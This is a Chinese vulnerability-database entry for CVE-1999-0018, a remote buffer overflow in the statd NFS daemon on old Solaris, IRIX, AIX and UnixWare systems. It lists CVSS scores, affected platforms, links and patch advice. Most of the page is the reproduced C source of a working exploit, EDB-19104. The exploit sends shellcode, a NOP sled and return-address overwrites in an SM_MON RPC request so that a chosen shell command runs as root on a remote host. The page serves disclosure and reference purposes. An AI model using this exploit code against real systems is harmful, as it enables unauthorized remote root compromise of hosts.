CVE-1999-0018
CVSS10.0
发布时间 :1997-12-05 00:00:00
修订时间 :2008-09-09 08:33:32
NMCOE    

[原文]Buffer overflow in statd allows root privileges.


[CNNVD]多个供应商Statd缓冲区溢出漏洞漏洞(CNNVD-199712-005)

        Statd存在缓冲区溢出漏洞,可以允许根特权。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:5.0
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:2.5.1
cpe:/o:sgi:irix:5.0.1SGI IRIX 5.0.1
cpe:/o:sgi:irix:5.2SGI IRIX 5.2
cpe:/o:sgi:irix:5.1SGI IRIX 5.1
cpe:/o:sgi:irix:5.1.1SGI IRIX 5.1.1
cpe:/o:sgi:irix:5.3SGI IRIX 5.3
cpe:/o:ibm:aix:3.2IBM AIX 3.2
cpe:/o:ibm:aix:4.1IBM AIX 4.1
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sun:solaris:2.5.1::x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0018
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0018
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199712-005
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/127
(PATCH)  BID  127

- 漏洞信息

多个供应商Statd缓冲区溢出漏洞漏洞
危急 缓冲区溢出
1997-12-05 00:00:00 2007-07-16 00:00:00
远程  
        Statd存在缓冲区溢出漏洞,可以允许根特权。

- 公告与补丁

        Statd is required for use in deployed NFS systems. Therefore if you require NFS on systems which are vulnerable to this attack it is suggested you upgrade your OS or obtain the appropriate patches from your vendor.
        Relavant patch information is contained in the reference section via the attached vendor advisories.
        Caldera has released a hotfix for the Unixware 7 statd implementation.
        SCO Unixware 7.0
        
        SCO Unixware 7.0.1
        
        SCO Unixware 7.1
        
        SCO Unixware 7.1.1
        

- 漏洞信息 (19104)

IBM AIX 3.2/4.1,SCO Unixware <= 7.1.1,SGI IRIX <= 5.3,Sun Solaris <= 2.5.1 (EDBID:19104)
linux remote
1997-11-24 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/127/info

Statd is the RPC NFS status daemon. It is used to communicate status information to other services or host.

The version of statd shipped with many unix implementations contains a buffer overflow condition. This overflow condition exists in the handling of 'SM_MON' RPC requests.

Any attacker to successfully exploit this vulnerability would gain root privileges on the target host.


/*
 statd remote overflow, solaris 2.5.1 x86
 there is a patch for statd in solaris 2.5, well, it looks like
 they check only for '/' characters and they left overflow there ..
 nah, it's solaris

 usage: ./r host [cmd]  # default cmd is "touch /tmp/blahblah"
                        # remember that statd is standalone daemon

 Please do not distribute.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/sm_inter.h>
#include <sys/socket.h>

#define BUFSIZE 1024
#define ADDRS 2+1+1+4
#define ADDRP 0x8045570;

/* up to ~ 150 characters, there must be three strings */
char *cmd[3]={"/bin/sh", "-c", "touch /tmp/blahblah"};

char asmcode[]="\xeb\x3c\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\xf7\x83\xc7\x10\x89\x3e\x4f\x47\xfe\x07\x75\xfb\x47\x89\x7e\x04\x4f\x47\xfe\x07\x75\xfb\x47\x89\x7e\x08\x4f\x47\xfe\x07\x75\xfb\x89\x46\x0c\x50\x56\xff\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x0


1\x07\x07\xe8\xbf\xff\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";
char nop[]="\x90";

char code[4096];

void usage(char *s) {
  printf("Usage: %s host [cmd]\n", s);
  exit(0);
}

main(int argc, char *argv[]) {
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct mon monreq;
  struct sm_stat_res monres;
  struct hostent *hp;
  struct sockaddr_in target;
  int sd, i, noplen=strlen(nop);
  char *ptr=code;

  if (argc < 2)
    usage(argv[0]);
  if (argc == 3)
    cmd[2]=argv[2];

  for (i=0; i< sizeof(code); i++)
    *ptr++=nop[i % noplen];

  strcpy(&code[750], asmcode);  /* XXX temp. */
  ptr=code+strlen(code);
  for (i=0; i<=strlen(cmd[0]); i++)
    *ptr++=cmd[0][i]-1;
  for (i=0; i<=strlen(cmd[1]); i++)
    *ptr++=cmd[1][i]-1;
  for (i=0; i<=strlen(cmd[2]); i++)
    *ptr++=cmd[2][i]-1;
  ptr=code+BUFSIZE-(ADDRS<<2);
  for (i=0; i<ADDRS; i++, ptr+=4)
    *(int *)ptr=ADDRP;
  *ptr=0;

  printf("strlen = %d\n", strlen(code));

  memset(&monreq, 0, sizeof(monreq));
  monreq.mon_id.my_id.my_name="localhost";
  monreq.mon_id.my_id.my_prog=0;
  monreq.mon_id.my_id.my_vers=0;
  monreq.mon_id.my_id.my_proc=0;
  monreq.mon_id.mon_name=code;

  if ((hp=gethostbyname(argv[1])) == NULL) {
    printf("Can't resolve %s\n", argv[1]);
    exit(0);
  }
  target.sin_family=AF_INET;
  target.sin_addr.s_addr=*(u_long *)hp->h_addr;
  target.sin_port=0;    /* ask portmap */
  sd=RPC_ANYSOCK;

  tm.tv_sec=10;
  tm.tv_usec=0;
  if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res,
                (char *)&monres, tm);
  if (stat != RPC_SUCCESS)
    clnt_perror(cl, "clnt_call");
  else
    printf("stat_res = %d.\n", monres.res_stat);
  clnt_destroy(cl);
}
		

- 漏洞信息

8420
Multiple Unix Vendor rpc.statd Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1997-12-05 Unknow
1997-11-24 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站